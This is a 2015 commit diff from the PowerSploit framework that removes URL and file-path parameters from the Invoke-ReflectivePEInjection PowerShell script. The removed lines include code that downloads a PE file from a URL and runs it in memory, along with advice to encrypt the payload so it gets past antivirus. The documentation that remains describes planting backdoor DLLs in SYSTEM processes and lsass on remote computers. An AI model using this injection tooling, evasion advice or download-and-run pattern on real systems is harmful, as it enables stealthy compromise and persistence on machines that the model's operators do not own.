diff options
| author | Matt Graeber <PowerShellMafia@users.noreply.github.com> | 2015-11-07 20:00:22 -0800 |
|---|---|---|
| committer | Matt Graeber <PowerShellMafia@users.noreply.github.com> | 2015-11-07 20:00:22 -0800 |
| commit | 992f9800229d58158a4094f8ab4a92e0473fef34 (patch) | |
| tree | 9cac7d642ff6e83688b2ec43e0c063dfaa1a397e | |
| parent | b8e831e4f9650169371fafc24352b8cdd7e65932 (diff) | |
| download | PowerSploit-992f9800229d58158a4094f8ab4a92e0473fef34.tar.gz PowerSploit-992f9800229d58158a4094f8ab4a92e0473fef34.zip | |
Removed extraneous parameters
Removed extraneous parameters
Removed the following extraneous parameters:
-PEPath
-PEUrl
The functionality they provided can be easily replicated in code outside
of Invoke-ReflectivePEInjection. i.e. it should be up to the user how
they might want to download a PE before loading it. That should not be
dictated by Invoke-ReflectivePEInjection.
| -rw-r--r-- | CodeExecution/Invoke-ReflectivePEInjection.ps1 | 71 |
1 files changed, 13 insertions, 58 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index b176d8a..503ea7f 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -7,14 +7,12 @@ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShe or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. - 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk. - 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. @@ -22,31 +20,17 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. - -While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array -containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will -bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba -blog linked below (thanks to whitey). - PowerSploit Function: Invoke-ReflectivePEInjection Author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. -.PARAMETER PEPath - -The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. - -.PARAMETER PEUrl - -A URL containing a DLL/EXE to load and execute. - .PARAMETER PEBytes A byte array containing a DLL/EXE to load and execute. @@ -81,40 +65,34 @@ Optional, will force the use of ASLR on the PE being loaded even if the PE indic .EXAMPLE -Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). -Note that the file name on the website can be any file extension. -Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString - -.EXAMPLE - Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local .EXAMPLE Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print the wchar_t* returned by WStringFunc() from all the computers. -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) .EXAMPLE Load DemoEXE and run it locally. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE Load DemoEXE and run it locally. Forces ASLR on for the EXE. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR +$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. -Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local - -.EXAMPLE - -Load a PE from a byte array. -Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local .NOTES GENERAL NOTES: @@ -134,8 +112,6 @@ The script has 3 basic sets of functionality: -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. - - DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. @@ -182,17 +158,9 @@ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/b #> -[CmdletBinding(DefaultParameterSetName="WebFile")] +[CmdletBinding()] Param( - [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] - [String] - $PEPath, - - [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] - [Uri] - $PEUrl, - - [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] + [Parameter(Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, @@ -218,7 +186,6 @@ Param( [String] $ProcName, - [Parameter(Position = 6)] [Switch] $ForceASLR ) @@ -2900,18 +2867,6 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" - if ($PsCmdlet.ParameterSetName -ieq "LocalFile") - { - Get-ChildItem $PEPath -ErrorAction Stop | Out-Null - [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) - } - elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") - { - $WebClient = New-Object System.Net.WebClient - - [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) - } - #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' |